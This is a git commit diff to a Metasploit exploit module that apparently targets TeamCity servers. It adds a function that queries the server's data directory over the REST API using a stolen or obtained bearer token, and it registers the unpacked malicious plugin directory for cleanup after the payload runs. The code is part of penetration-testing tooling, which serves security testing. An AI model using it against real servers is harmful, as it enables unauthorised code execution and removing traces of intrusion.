we can also register this path for cleanup
This commit is contained in:
parent
d5bcac1370
commit
30e761831e
|
@ -346,6 +346,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_warning('Could not discover install path. Unable to register files for cleanup.')
|
||||
end
|
||||
|
||||
# On a Linux target we see the extracted plugin file remaining here even after we delete the plugin.
|
||||
# /home/teamcity/.BuildServer/system/caches/plugins.unpacked/XXXXXXXX/
|
||||
if (data_path = get_data_dir_path(token_value))
|
||||
vprint_status("Target data directory path: #{data_path}")
|
||||
|
||||
register_dir_for_cleanup([data_path, 'system', 'caches', 'plugins.unpacked', plugin_name].join(sep))
|
||||
else
|
||||
print_warning('Could not discover data directory path. Unable to register files for cleanup.')
|
||||
end
|
||||
|
||||
#
|
||||
# 7. Trigger the payload and get a session. ARCH_JAVA JSP payloads need us to hit an endpoint. ARCH_JAVA Java
|
||||
# payloads and ARCH_CMD payloads are triggered upon enabling a loaded plugin.
|
||||
|
@ -423,6 +433,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
nil
|
||||
end
|
||||
|
||||
def get_data_dir_path(token_value)
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server', 'dataDirectoryPath'),
|
||||
'headers' => {
|
||||
'Authorization' => "Bearer #{token_value}"
|
||||
}
|
||||
)
|
||||
|
||||
unless res&.code == 200
|
||||
print_warning('Failed to request data directory path.')
|
||||
return nil
|
||||
end
|
||||
|
||||
res.body
|
||||
end
|
||||
|
||||
def get_build_number(token_value)
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
|
|
Loading…
Reference in New Issue